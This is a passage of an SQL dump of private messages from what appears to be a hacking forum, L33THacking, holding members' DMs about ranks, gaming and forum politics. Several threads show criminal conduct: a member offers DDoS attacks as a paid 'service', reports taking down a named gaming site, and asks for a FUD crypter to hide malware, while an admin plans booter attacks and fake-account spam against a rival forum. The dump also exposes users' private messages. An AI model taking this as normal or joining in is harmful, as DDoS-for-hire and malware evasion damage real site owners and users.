botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D\r\n[/quote]\r\nGood Luck with the sales. \r\n[/quote]\r\n\r\nThanks!\r\n[/quote]\r\n\r\nNo problem.\r\n[/quote]\r\n\r\nYou wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder.\r\n[/quote]\r\n\r\nNope, my PC broke down so I\'m buying a new one. \r\n[/quote]\r\n\r\nThat sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D\r\n[/quote]\r\n\r\nCool, BTW I thought you had a free upgrade right? \r\n[/quote]\r\n\r\nI did?!', '1348963091', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2787', '3', '3', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Why?', '0', '[quote=\'??????????¢™\']\r\n[quote=\'NeonLights\']\r\n[quote=\'??????????¢™\']\r\nWhy do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea.\r\n[/quote]\r\n\r\nhmm :/\r\ni still think u should be a daily hq poster to deserve the slitest spot on this forum but like i said i dont decide\r\n\r\n\r\n[/quote]\r\n\r\nWell I still love you NO HOMO\r\n[/quote]\r\n\r\nsame :)\r\njust be more active :/\r\nil remove my rep ', '1349738088', '0', '3', '1349738295', '1', '0', '2', '1349738223'); INSERT INTO mybb_privatemessages VALUES('2236', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D\r\n[/quote]\r\nGood Luck with the sales. \r\n[/quote]\r\n\r\nThanks!\r\n[/quote]\r\n\r\nNo problem.\r\n[/quote]\r\n\r\nYou wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder.\r\n[/quote]\r\n\r\nNope, my PC broke down so I\'m buying a new one. \r\n[/quote]\r\n\r\nThat sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D\r\n[/quote]\r\n\r\nCool, BTW I thought you had a free upgrade right? \r\n[/quote]\r\n\r\nI did?!\r\n[/quote]\r\n\r\nI thought. Not sure. Well umm if you get the upgrade, what will you do for me? I don\'t want the DDoS.\r\n[/quote]\r\n\r\nOh erm, I don\'t really know then. xD Thats my only service.', '1348963702', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2665', '222', '222', '232', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'LH Coders - Your Project', '0', 'Hey there, flamingworm.\r\n\r\nIn order to keep the LHC free of people whom claim to code, but can\'t, each applicant is assigned a project which must be completed within 72 hours. All projects are different to one another to keep it free flowing and not-easily copied amongst other members. You may code the project in any language you choose.\r\n\r\n\r\nYou can:\r\n[list]\r\n[*]Use google to help you\r\n[*]Ask for help in the forums\r\n[*]Submit the project anytime, as long as it\'s within the 72 hours\r\n[/list]\r\n\r\nYou cannot:\r\n[list]\r\n[*]Copy and Paste\r\n[*]Get others to complete the project for you\r\n[*]Submit a project after the 72 hours\r\n[/list]\r\n\r\nYou must:\r\n[list]\r\n[*]Use correct indentation\r\n[*]Comment out code\r\n[*]Complete to the best of your ability\r\n[/list]\r\n\r\n\r\n[b]Your project:[/b]\r\nYou\'re to create a program which can interact with the user. It should be able to receive information from which the user enters, and then output data of your choice depending on the data which is entered. You can do this as complex or as subtle as you wish, but follow the above guidelines.', '1349667765', '0', '1', '0', '0', '0', '0', '1349667813'); INSERT INTO mybb_privatemessages VALUES('2786', '3', '203', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: Why?', '0', '[quote=\'NeonLights\']\r\n[quote=\'??????????¢™\']\r\nWhy do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea.\r\n[/quote]\r\n\r\nhmm :/\r\ni still think u should be a daily hq poster to deserve the slitest spot on this forum but like i said i dont decide\r\n\r\n\r\n[/quote]\r\nWell I still love you NO HOMO', '1349737908', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2241', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D\r\n[/quote]\r\nGood Luck with the sales. \r\n[/quote]\r\n\r\nThanks!\r\n[/quote]\r\n\r\nNo problem.\r\n[/quote]\r\n\r\nYou wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder.\r\n[/quote]\r\n\r\nNope, my PC broke down so I\'m buying a new one. \r\n[/quote]\r\n\r\nThat sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D\r\n[/quote]\r\n\r\nCool, BTW I thought you had a free upgrade right? \r\n[/quote]\r\n\r\nI did?!\r\n[/quote]\r\n\r\nI thought. Not sure. Well umm if you get the upgrade, what will you do for me? I don\'t want the DDoS.\r\n[/quote]\r\n\r\nOh erm, I don\'t really know then. xD Thats my only service.\r\n[/quote]\r\n\r\nBe active and contribute daily. \r\n[/quote]\r\n\r\nSounds good.', '1348968598', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2247', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\nHey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.\r\n[/quote]\r\n\r\nSure and how about elitelobby.com?\r\n[/quote]\r\n\r\nWell I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.\r\n[/quote]\r\n\r\nSure http://www.nintendolounge.com/\r\n[/quote]\r\n\r\nDown as of 12:23 PM EST\r\n[/quote]\r\n\r\nDone. \r\n[/quote]\r\n\r\n;D\r\n[/quote]\r\nGood Luck with the sales. \r\n[/quote]\r\n\r\nThanks!\r\n[/quote]\r\n\r\nNo problem.\r\n[/quote]\r\n\r\nYou wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder.\r\n[/quote]\r\n\r\nNope, my PC broke down so I\'m buying a new one. \r\n[/quote]\r\n\r\nThat sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D\r\n[/quote]\r\n\r\nCool, BTW I thought you had a free upgrade right? \r\n[/quote]\r\n\r\nI did?!\r\n[/quote]\r\n\r\nI thought. Not sure. Well umm if you get the upgrade, what will you do for me? I don\'t want the DDoS.\r\n[/quote]\r\n\r\nOh erm, I don\'t really know then. xD Thats my only service.\r\n[/quote]\r\n\r\nBe active and contribute daily. \r\n[/quote]\r\n\r\nSounds good.\r\n[/quote]\r\nCool, I will upgrade you tomorrow but if you go inactive for a week or more without telling us that you are going somewhere then I will remove it and put you back when you come back. Deal?\r\n[/quote]\r\n\r\nDeal.', '1349007483', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2250', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Gamers', '0', 'You have been Accepted.. Obviously.\r\n\r\n:D\r\n', '1349024317', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2254', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usergroup error', '0', '[quote=\'t3h jok3r\']\r\nEarlier on today when I made your usergroup I forgot to change the usergroup color from light green to grey. It\'s done now. \r\n[/quote]\r\n\r\nIf you could, May I get the userbar changed to this\r\nhttp://i.imgur.com/CWKlk.png\r\n\r\nThe colors of the current one don\'t really match the websites colors.', '1349024731', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2260', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Hiya ', '0', 'Hey I saw you do a GFX service? I was hoping I could get a free signature. ;D Thanks for your time, if you agree to do this for me, and you make it really HQ I\'m willing to pay you a little money. I hope you\'ll consider my request. Thanks again ~GRONgamer61', '1349025957', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2264', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Hiya ', '0', '[quote=\'R?????zo?\']\r\n[quote=\'GRONgamer61\']\r\nHey I saw you do a GFX service? I was hoping I could get a free signature. ;D Thanks for your time, if you agree to do this for me, and you make it really HQ I\'m willing to pay you a little money. I hope you\'ll consider my request. Thanks again ~GRONgamer61\r\n[/quote]\r\n\r\nwhat do you want to be made, i dont see your request. can you please post on my thread http://l33thacking.net/thread-431.html\r\nand I will do it for you :)\r\n[/quote]\r\n\r\nMade the post, I also updated what I would like it too be ;D', '1349029860', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2266', '61', '100', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Group', '0', 'Fill out an application in the thread, Please don\'t apply via user cp.', '1349036137', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2273', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'What did I do?!', '0', 'Dude you banned my IP?!?! For both my main VPN and my backup one???? What did I do??!? This is another VPN of mine..', '1349038900', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2278', '100', '82', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Loooool', '0', '[quote=\'iTzIpod\']\r\nBooting Tyler :p\r\n[/quote]\r\n\r\nxDDDD', '1349048606', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2283', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\']\r\nYou have been upgraded hope you stay active and complete your side of the deal :D\r\n[/quote]\r\n\r\nDefiantly ;DDDD', '1349048711', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2286', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\nYou have been upgraded hope you stay active and complete your side of the deal :D\r\n[/quote]\r\n\r\nDefiantly ;DDDD\r\n[/quote]\r\nThat was a fast reply. \r\n[/quote]\r\n\r\nI just happened to be checking my private messages when you sent it.', '1349048783', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2289', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\nYou have been upgraded hope you stay active and complete your side of the deal :D\r\n[/quote]\r\n\r\nDefiantly ;DDDD\r\n[/quote]\r\nThat was a fast reply. \r\n[/quote]\r\n\r\nI just happened to be checking my private messages when you sent it.\r\n[/quote]\r\n\r\nOh LOL.\r\n[/quote]\r\n\r\nHow to I make the \"Elite\" usergroup tag show under my name rather then the \"Unique\" usergroup tag?\r\n', '1349049058', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2292', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzGRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\nYou have been upgraded hope you stay active and complete your side of the deal :D\r\n[/quote]\r\n\r\nDefiantly ;DDDD\r\n[/quote]\r\nThat was a fast reply. \r\n[/quote]\r\n\r\nI just happened to be checking my private messages when you sent it.\r\n[/quote]\r\n\r\nOh LOL.\r\n[/quote]\r\n\r\nHow to I make the \"Elite\" usergroup tag show under my name rather then the \"Unique\" usergroup tag?\r\n\r\n[/quote]\r\nUserCP>Group Memberships>elite>Display\r\n\r\n[/quote]\r\n\r\nNope.. I can go as far as Group Memberships. Its ok I\'ll figure it out later. Thanks!', '1349049500', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2778', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nHey joker, are reg members able to neg rep?\r\n[/quote]\r\n\r\nDude I swear to god I was about to PM you. Anyway, I need a new Mod not the best I can do but are you interested?\r\n\r\nI don\'t think they can. \r\n[/quote]\r\nYes I am interested but I would prefer staff or admin but mod is okay for right now. Also since Itzipod or whatever his name is isnt mod or upgraded member could you remove his neg off of me?\r\n[/quote]\r\n\r\nDone and OK.\r\n[/quote]\r\nThanks man, and thats why I love you NO HOMO\r\n[/quote]\r\n\r\nLOL btw I\'m planning an attack on AF are you interestd? If not then it\'s cool np. \r\n[/quote]\r\nYes I am interested just hit me up with the info.\r\n[/quote]\r\n\r\nTomorrow I\'m getting access to HF, so I will get their booters to hit Anarchy the whole week I will create fake accounts and SPAM anarchy.\r\n[/quote]\r\nOkay', '1349735757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2780', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Ridiculous ', '0', 'Yo bro check my rep and see what NeonLights put. No body likes me lol.', '1349736194', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3028', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.\r\n[/quote]\r\n\r\nCan I get a screenshot or something to back up myself while talking to him?\r\n[/quote]\r\nNevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.\r\n[/quote]\r\n\r\nWhen was the last post?\r\n[/quote]\r\n\r\n10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy.\r\n[/quote]\r\n\r\nWell OK then ;)\r\n[/quote]\r\nDoes that help you?\r\n[/quote]\r\n\r\nNope, it basically backups his story which means that he was out of town. BTW do you know the user Monkey?\r\n[/quote]\r\nNope', '1350095178', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2782', '3', '203', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Why?', '0', 'Why do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea.', '1349737549', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2783', '3', '3', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Why?', '0', '[quote=\'??????????¢™\']\r\nWhy do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea.\r\n[/quote]\r\n\r\nhmm :/\r\ni still think u should be a daily hq poster to deserve the slitest spot on this forum but like i said i dont decide\r\n\r\n', '1349737753', '0', '3', '1349737908', '1', '0', '2', '1349737872'); INSERT INTO mybb_privatemessages VALUES('2295', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzGRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzGRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'GRONgamer61\']\r\n[quote=\'t3h jok3r\']\r\nYou have been upgraded hope you stay active and complete your side of the deal :D\r\n[/quote]\r\n\r\nDefiantly ;DDDD\r\n[/quote]\r\nThat was a fast reply. \r\n[/quote]\r\n\r\nI just happened to be checking my private messages when you sent it.\r\n[/quote]\r\n\r\nOh LOL.\r\n[/quote]\r\n\r\nHow to I make the \"Elite\" usergroup tag show under my name rather then the \"Unique\" usergroup tag?\r\n\r\n[/quote]\r\nUserCP>Group Memberships>elite>Display\r\n\r\n[/quote]\r\n\r\nNope.. I can go as far as Group Memberships. Its ok I\'ll figure it out later. Thanks!\r\n[/quote]\r\n\r\nI did it for you. \r\n[/quote]\r\n\r\nohh ! thanks XD', '1349050254', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2301', '199', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: L33THacking', '0', '[quote=\'t3h jok3r\']\r\nSo how do you find L33THacking? Are you liking us so far? \r\n[/quote]\r\n\r\n\r\nI saw the link to this forum in a pastebin I do not know from where and I like this forum very much.', '1349052149', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2304', '199', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: L33THacking', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Anonymous™\']\r\n[quote=\'t3h jok3r\']\r\nSo how do you find L33THacking? Are you liking us so far? \r\n[/quote]\r\n\r\n\r\nI saw the link to this forum in a pastebin I do not know from where and I like this forum very much.\r\n[/quote]\r\n\r\nOpps lol I meant how you find LH as in do you find it to be a cool site :) or boring :\'(\r\n[/quote]\r\n\r\n\r\nI\'m sorry, I\'m very tired I think this forum is very interesting.', '1349052345', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2307', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3', '1349066552', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2310', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', 'Hey mate,\r\n\r\nI tried logging In, but this message came up that my IP has been banned:\r\n\r\n[IMG] http://i48.tinypic.com/214rpkp.png [/IMG]\r\n\r\nI\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums....', '1349092378', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2312', '61', '62', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Gamers', '0', 'You have been accepted.\r\n\r\nI too play counter:strike source and GO at a very competive level.', '1349100384', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2314', '62', '61', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Gamers', '0', '[quote=\'NXK\']\r\nYou have been accepted.\r\n\r\nI too play counter:strike source and GO at a very competive level.\r\n[/quote]\r\n\r\nwe should play CS:GO together, heres my steam r3loadz0r', '1349105031', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2319', '61', '62', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Gamers', '0', '[quote=\'R?????zo?\']\r\n[quote=\'NXK\']\r\nYou have been accepted.\r\n\r\nI too play counter:strike source and GO at a very competive level.\r\n[/quote]\r\n\r\nwe should play CS:GO together, heres my steam r3loadz0r\r\n[/quote]\r\n\r\nAdded you.', '1349123636', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2321', '61', '203', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Accepted', '0', 'You have been accepted. Try to post HQ in our groups sub forum.', '1349124754', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2323', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: plz read :D', '0', '[quote=\'NeonLights\']\r\ngo to this thread: http://l33thacking.net/thread-431-post-3127.html#pid3127\r\n\r\nlook at my reply :3\r\nif u could make it happen it would be epic thx for ur time :D\r\n[/quote]\r\n\r\ncheck it on my thread :D', '1349129976', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2333', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever mind lol I am in a tired state of mind.', '1349144728', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2336', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever mind lol I am in a tired state of mind.\r\n[/quote]\r\n\r\nWhy what\'s up?\r\n[/quote]\r\nI do not sleep enough, sports, life etc :/', '1349145600', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2339', '61', '199', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '2', 'Accepted', '0', 'You have been accepted.\r\n', '1349179615', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2341', '100', '5', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Script', '0', '[quote=\'Timmy\']\r\nCan I have it? \r\n[/quote]\r\n\r\n\r\nhttp://pastebin.com/EgnhCsGm\r\n\r\nHave fun!', '1349187754', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2344', '61', '5', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Credit', '0', 'Make sure when you C+P a tutorial you give proper credits to the writer.', '1349220829', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2349', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever 